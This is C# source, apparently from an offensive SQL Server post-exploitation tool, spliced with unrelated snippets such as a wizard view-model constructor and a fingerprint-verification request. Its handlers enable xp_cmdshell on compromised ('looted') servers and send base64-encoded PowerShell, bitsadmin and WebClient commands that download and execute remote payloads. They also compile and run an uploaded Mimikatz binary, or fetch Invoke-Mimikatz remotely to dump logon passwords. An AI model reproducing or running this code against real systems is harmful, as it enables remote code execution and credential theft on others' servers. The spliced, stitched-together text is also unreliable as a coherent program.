public WizardViewModel()
{
this.PrevEnabled = false;
this.NextEnabled = true;
this.CloseEnabled = true;
this.CheckEnabled = false;
this.SkipEnabled = true;
this.Loading = false;
this.Permiso = new PermissionValidator();
this.Api = new ApiService();
this.Codificator = new EncodeBase64();
this.IsAnalyzing = false;
this.IsScanning = false;
var mainViewModel = MainViewModel.GetInstance();
this.token = mainViewModel.Token;
this.user = mainViewModel.User;
this.PositionWizard = 0;
this.LoadSlides();
}
private void btnDownload_Click(object sender, RoutedEventArgs e)
{
var isActivated = cmdControl.isActivated;
var isExecuted = cmdControl.isExecuted;
if (isActivated == false && isExecuted == false)
{
var enableXpCmdShell = new EnableXpCmdShell {
LootedServer = lstLooted.SelectedItem.ToString()
};
try
{
Dispatcher.Invoke((Action) delegate
{
enableXpCmdShell.XpCmdShellStatus();
txtStatus.AppendText(enableXpCmdShell.Result);
var cmdLandResult = _languageControl.SelectedLanguage.GetString("XPCmdShell2");
var contains = enableXpCmdShell.Result.Contains(cmdLandResult);
if (contains == true)
{
isActivated = true;
isExecuted = true;
}
});
}
catch (Exception)
{
Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
{
txtStatus.AppendText(enableXpCmdShell.CmdException);
});
}
}
if (isExecuted == true && isActivated == true)
{
Dispatcher.Invoke((Action) delegate
{
var clearText = "(new-object System.Net.WebClient).DownloadFile('" + txtUrl.Text + "', '" + txtSaveLocation.Text + "')";
clearText = EncodeBase64.ConvertTextToBase64NonBypass(clearText);
var _execCode = string.Empty;
_execCode += "EXEC xp_cmdshell '" + clearText + "'";
txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageDownload5")}");
RevConn(_execCode);
});
}
}
private string ComputeVerification()
{
var key = tboxKey.Text;
var templateEconded = EncodeBase64.ImageToBase64(template.FileBytes);
var queryEconded = EncodeBase64.ImageToBase64(query.FileBytes);
var ps = new[] { "key", key, "template", templateEconded, "query", queryEconded };
HttpWebRequest request = (HttpWebRequest)WebRequest.Create("http://localhost:53210/api/PrintVerification/");
request.Proxy = WebRequest.DefaultWebProxy;
string str = "";
for (int i = 0; i + 1 < ps.Length; i += 2)
{
str += (ps[i]) + "=" + (ps[i + 1]) + "&";
}
if (str.EndsWith("&"))
{
str = str.Substring(0, str.Length - 1);
}
request.Method = "POST";
request.ContentType = "application/x-www-form-urlencoded";
byte[] buffer = Encoding.ASCII.GetBytes(str);
request.ContentLength = buffer.Length;
Stream newStream = request.GetRequestStream();
newStream.Write(buffer, 0, buffer.Length);
WebResponse response = request.GetResponse();
Stream sStream = response.GetResponseStream();
StreamReader reader = new StreamReader(sStream);
string ResponseSt = reader.ReadToEnd();
reader.Close();
response.Close();
newStream.Close();
return(ResponseSt);
}
private void RevConn(string execCode)
{
try
{
if (lstLooted.SelectedIndex != -1)
{
try
{
var isError = false;
Dispatcher.Invoke((Action) delegate
{
_postExploitation.SelectedItem = lstLooted.SelectedItem.ToString();
_postExploitation.ExploitCode = execCode;
_postExploitation.RunExploit();
var result = _postExploitation.ExploitResult;
isError = result.Contains("be resolved");
if (result == "\r\n")
{
txtStatus.AppendText(Environment.NewLine + _languageControl.SelectedLanguage.GetString("ExploitClearLog2"));
}
else if (isError == true)
{
txtStatus.AppendText(Environment.NewLine + _languageControl.SelectedLanguage.GetString("MessageDownload6"));
}
else if (isError == false)
{
var result2 = result.Contains("Completed");
if (result2 == true)
{
txtStatus.AppendText(Environment.NewLine + _languageControl.SelectedLanguage.GetString("MessageDownload8") + txtSaveLocation.Text);
}
}
if (isError == true)
{
txtStatus.AppendText(Environment.NewLine + _languageControl.SelectedLanguage.GetString("MessageDownload7"));
_postExploitation.SelectedItem = lstLooted.SelectedItem.ToString();
txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageDownload5")}");
var expCode = EncodeBase64.ConvertTextToBase64NonBypass("Invoke-WebRequest \"" + txtUrl.Text + "\" -OutFile \"" + txtSaveLocation.Text + "\"");
_postExploitation.ExploitCode = "EXEC xp_cmdshell '" + expCode + "'";
_postExploitation.RunExploit();
var resultz = _postExploitation.ExploitResult;
isError = false;
isError = resultz.Contains("be resolved");
if (resultz == "\r\n")
{
txtStatus.AppendText(Environment.NewLine + _languageControl.SelectedLanguage.GetString("ExploitClearLog2"));
}
else if (isError == true)
{
txtStatus.AppendText(Environment.NewLine + _languageControl.SelectedLanguage.GetString("MessageDownload6"));
}
else if (isError == false)
{
txtStatus.AppendText(Environment.NewLine + _languageControl.SelectedLanguage.GetString("MessageDownload6") + txtSaveLocation.Text);
}
}
});
}
catch (Exception exp)
{
Dispatcher.Invoke((Action) delegate
{
txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2")));
});
}
}
else
{
Dispatcher.Invoke((Action) delegate
{
txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageExploitError1")}");
});
}
}
catch (Exception exp)
{
Dispatcher.Invoke((Action) delegate
{
txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2")));
});
}
}
private void btnDownloadExecute_Click(object sender, RoutedEventArgs e)
{
var isActivated = cmdControl.isActivated;
var isExecuted = cmdControl.isExecuted;
if (isActivated == false && isExecuted == false)
{
var enableXpCmdShell = new EnableXpCmdShell {
LootedServer = lstLooted.SelectedItem.ToString()
};
try
{
Dispatcher.Invoke((Action) delegate
{
enableXpCmdShell.XpCmdShellStatus();
txtStatus.AppendText(enableXpCmdShell.Result);
var cmdLandResult = _languageControl.SelectedLanguage.GetString("XPCmdShell2");
var contains = enableXpCmdShell.Result.Contains(cmdLandResult);
if (contains == true)
{
isActivated = true;
isExecuted = true;
}
});
}
catch (Exception)
{
Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
{
txtStatus.AppendText(enableXpCmdShell.CmdException);
});
}
}
if (isExecuted == true && isActivated == true)
{
if (rdBits.IsChecked == true)
{
try
{
if (!string.IsNullOrEmpty(txtUrl.Text) && !string.IsNullOrEmpty(txtSaveLocation.Text))
{
var _execCode = string.Empty;
Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
{
_execCode += "USE [master]\r\n";
_execCode += "EXEC xp_cmdshell '\"net start BITS\"';\r\n";
txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageDownload1")}");
RevConn(_execCode, 0);
_execCode += "USE [master]\r\n";
_execCode += "EXEC xp_cmdshell '\"bitsadmin /transfer WarSQLiJob /download /priority normal " + txtUrl.Text + " " + txtSaveLocation.Text + "\"';\r\n";
txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageDownload2")}");
RevConn(_execCode, 0);
_execCode += "USE [master]\r\n";
_execCode += "EXEC xp_cmdshell '\"" + txtSaveLocation.Text + "\"';\r\n";
txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageDownload3")}");
RevConn(_execCode, 0);
});
}
}
catch (Exception exp)
{
Dispatcher.Invoke((Action) delegate
{
txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2")));
});
}
}
else
{
Dispatcher.Invoke((Action) delegate
{
var clearText = "(new-object System.Net.WebClient).DownloadFile('" + txtUrl.Text + "', '" + txtSaveLocation.Text + "')";
clearText = EncodeBase64.ConvertTextToBase64(clearText);
var _execCode = string.Empty;
_execCode += "EXEC xp_cmdshell '" + clearText + "'";
txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageDownload5")}");
RevConn(_execCode, 1);
_execCode = string.Empty;
_execCode += "EXEC xp_cmdshell '" + txtSaveLocation.Text + "'\r\n";
txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageDownload3")}");
RevConn(_execCode, 0);
});
}
}
}
private void BtnConvert_OnClick(object sender, RoutedEventArgs e)
{
txtBase64.Text = EncodeBase64.ConvertTextToBase64(txtClearText.Text);
}
private void btnRun_Click(object sender, RoutedEventArgs e)
{
var isActivated = cmdControl.isActivated;
var isExecuted = cmdControl.isExecuted;
if (isActivated == false && isExecuted == false)
{
var enableXpCmdShell = new EnableXpCmdShell {
LootedServer = lstLooted.SelectedItem.ToString()
};
try
{
Dispatcher.Invoke((Action) delegate
{
enableXpCmdShell.XpCmdShellStatus();
txtStatus.AppendText(enableXpCmdShell.Result);
var cmdLandResult = _languageControl.SelectedLanguage.GetString("XPCmdShell2");
var contains = enableXpCmdShell.Result.Contains(cmdLandResult);
if (contains == true)
{
isActivated = true;
isExecuted = true;
}
});
}
catch (Exception)
{
Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
{
txtStatus.AppendText(enableXpCmdShell.CmdException);
});
}
}
if (isExecuted == true && isActivated == true)
{
if (rdLocal.IsChecked == true)
{
var savedFileNAme = string.Empty;
var mimiBinary = File.ReadAllBytes(@"Scanner\Mimikatz\1.txt");
try
{
Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
{
_postExploitation.SelectedItem = lstLooted.SelectedItem.ToString();
_postExploitation.CreateBinaryTable();
txtStatus.AppendText(_postExploitation.ExploitResult);
_postExploitation.SelectedItem = lstLooted.SelectedItem.ToString();
_postExploitation.BinaryData = mimiBinary;
_postExploitation.InsertBinaryData();
txtStatus.AppendText(_postExploitation.ExploitResult);
});
}
catch (Exception exp)
{
Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
{
txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2")));
});
}
try
{
_postExploitation.ExploitCode = string.Empty;
var rnd = new Random();
var chr = "0123456789ABCDEFGHIJKLMNOPRSTUVWXYZ".ToCharArray();
var randomFileName = string.Empty;
for (int i = 0; i < 12; i++)
{
randomFileName += chr[rnd.Next(0, chr.Length - 1)].ToString();
}
var extension = "txt";
_postExploitation.ExploitCode += "DECLARE @cmd VARCHAR(8000);";
_postExploitation.ExploitCode += "SET @cmd = 'bcp.exe \"SELECT CAST(binaryTable AS VARCHAR(MAX)) FROM WarSQLiTemp\" queryout \"C:\\Users\\MSSQLSERVER\\" + randomFileName + "." + extension + "\" -c -T';";
_postExploitation.ExploitCode += "EXEC xp_cmdshell @cmd;";
Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
{
_postExploitation.SelectedItem = lstLooted.SelectedItem.ToString();
_postExploitation.RunExploit();
txtStatus.AppendText(_postExploitation.ExploitResult);
txtStatus.AppendText("File Saved: C:\\Users\\MSSQLSERVER\\" + randomFileName + "." + extension);
savedFileNAme = "C:\\Users\\MSSQLSERVER\\" + randomFileName + "." + extension;
});
}
catch (Exception exp)
{
Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
{
txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2")));
});
}
try
{
Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
{
_postExploitation.SelectedItem = lstLooted.SelectedItem.ToString();
_postExploitation.RemoveTempTable();
txtStatus.AppendText(_postExploitation.ExploitResult);
});
}
catch (Exception exp)
{
Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
{
txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2")));
});
}
try
{
Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
{
_postExploitation.ExploitCode = string.Empty;
_postExploitation.ExploitCode += "EXEC xp_cmdshell 'C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe /out:C:\\Users\\MSSQLSERVER\\eyup.exe " + savedFileNAme + "';";
_postExploitation.RunExploit();
txtStatus.AppendText(_postExploitation.ExploitResult);
});
Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
{
_postExploitation.ExploitCode = string.Empty;
_postExploitation.ExploitCode += "EXEC xp_cmdshell 'cmd.exe /c C:\\Users\\MSSQLSERVER\\eyup.exe';";
_postExploitation.RunExploit();
txtStatus.AppendText(_postExploitation.ExploitResult);
});
}
catch (Exception exp)
{
Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
{
txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2")));
});
}
}
else
{
try
{
Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
{
_postExploitation.SelectedItem = lstLooted.SelectedItem.ToString();
var sendMimiText = "IEX (New-Object Net.WebClient).DownloadString('" + txtUrl.Text + "'); Invoke-Mimikatz -Command \"privilege::debug sekurlsa::logonPasswords exit\"";
var psBs64 = EncodeBase64.ConvertTextToBase64(sendMimiText);
_postExploitation.ExploitCode = string.Empty;
_postExploitation.ExploitCode += "EXEC xp_cmdshell '" + psBs64 + "';";
_postExploitation.RunExploit();
txtStatus.AppendText(_postExploitation.ExploitResult);
});
}
catch (Exception exp)
{
Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
{
txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2")));
});
}
}
}
}
public static string ToView(string msg)
{
EncodeBase64 simpleQuote = new EncodeBase64();
return(simpleQuote.Decode(msg));
}
public static string ToDatabase(string msg)
{
EncodeBase64 simpleQuote = new EncodeBase64();
return(simpleQuote.Encode(msg));
}
